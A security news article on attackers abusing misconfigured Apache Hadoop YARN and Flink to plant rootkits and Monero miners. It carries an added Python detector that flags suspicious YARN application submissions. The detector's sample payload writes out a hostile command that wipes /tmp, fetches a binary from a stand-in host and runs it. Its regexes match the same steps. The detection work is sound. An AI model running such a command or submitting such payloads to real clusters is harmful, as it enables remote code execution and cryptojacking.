Cybersecurity researchers have discovered a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners in targeted environments.
"This attack is particularly intriguing due to the attacker's use of packers and rootkits to conceal the malware," Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. "The malware deletes contents of specific directories and modifies system configurations to evade detection."
The infection chain targeting Hadoop leverages a misconfiguration in YARN's (Yet Another Resource Negotiator) ResourceManager, which is responsible for tracking resources in a cluster and scheduling applications.
Specifically, the misconfiguration can be exploited by an unauthenticated, remote threat actor to execute arbitrary code by means of a crafted HTTP request, subject to the privileges of the user on the node where the code is executed.
The attacks aimed at Apache Flink, similarly, take aim at a misconfiguration that permits a remote attacker to achieve code execution without any authentication.
These misconfigurations are not novel and have been exploited in the past by financially motivated groups like TeamTNT, which is known for its history of targeting Docker and Kubernetes environments for the purpose of cryptojacking and other malicious activities.
But what makes the latest set of attacks noteworthy is the use of rootkits to hide crypto mining processes after gaining an initial foothold into Hadoop and Flink applications.
"The attacker sends an unauthenticated request to deploy a new application," the researchers said. "The attacker is able to run remote code by sending a POST request to the YARN, requesting to launch the new application with the attacker's command."
The command is purpose-built to clear the /tmp directory of all existing content, fetch a file called "dca" from a remote server, and execute it, followed by deleting all files in the /tmp directory once again.
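The application submission described above, as an added detection example that is not part of the original article or of Aqua's research: it inspects the JSON body of a YARN submit-application request (the `am-container-spec.commands.command` layout of the ResourceManager REST API) and flags launch commands that wipe /tmp, fetch a remote file and then execute it. The function names, heuristics, sample payloads, addresses and allowlist are all constructed for this example.

```python
import json
import re

# Each stage of the command the article describes gets one heuristic.
PATTERNS = {
    "wipes_tmp": re.compile(r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*\s+/tmp\b"),
    "fetches_remote_file": re.compile(r"\b(?:curl|wget)\b[^;|&]*https?://"),
    # The path made executable is invoked again later in the same command.
    "executes_downloaded": re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})\s+([^\s;]+).*\1"),
}

def extract_commands(payload: dict) -> list:
    """Return the AM container launch command(s) from a submit-application body."""
    cmd = payload.get("am-container-spec", {}).get("commands", {}).get("command", [])
    return [cmd] if isinstance(cmd, str) else list(cmd)

def score_command(cmd: str) -> list:
    """Names of the heuristics matched by one launch command."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmd)]

def audit_submission(body: str, source_ip: str, allowed_sources: set) -> dict:
    """Audit one POST /ws/v1/cluster/apps body: a non-allowlisted source, or
    two or more heuristic hits on a launch command, produces a finding."""
    payload = json.loads(body)
    findings = []
    if source_ip not in allowed_sources:
        findings.append(f"submission from non-allowlisted source {source_ip}")
    for cmd in extract_commands(payload):
        hits = score_command(cmd)
        if len(hits) >= 2:
            findings.append(f"suspicious launch command ({', '.join(hits)}): {cmd[:80]}")
    return {"application-name": payload.get("application-name"),
            "findings": findings, "alert": bool(findings)}

# Constructed sample: a submission mirroring the /tmp-wipe, fetch, execute pattern.
SUSPICIOUS_BODY = json.dumps({
    "application-id": "application_0000000000000_0001",
    "application-name": "stats-job",
    "am-container-spec": {"commands": {"command":
        "rm -rf /tmp/*; curl -o /tmp/dca http://staging.example/dca; "
        "chmod +x /tmp/dca; /tmp/dca; rm -rf /tmp/*"}},
})
# Constructed sample: an ordinary Java application master launch.
BENIGN_BODY = json.dumps({
    "application-id": "application_0000000000000_0002",
    "application-name": "nightly-etl",
    "am-container-spec": {"commands": {"command":
        "{{JAVA_HOME}}/bin/java -Xmx256m -jar etl-am.jar"}},
})
```

Run the audit on each submission body seen at the ResourceManager REST endpoint, for example `audit_submission(SUSPICIOUS_BODY, "203.0.113.7", {"10.0.0.5"})`, and forward any result with `alert` set to your alerting pipeline.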
The executed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It's worth pointing out that various adversaries, including Kinsing, have resorted to using rootkits to conceal the presence of the mining process.
To achieve persistence, a cron job is created to download and execute a shell script that deploys the 'dca' binary. Further analysis of the threat actor's infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
As mitigations, it's recommended that organizations deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, as well as other suspicious runtime behaviors.
Some parts of this article are sourced from:
thehackernews.com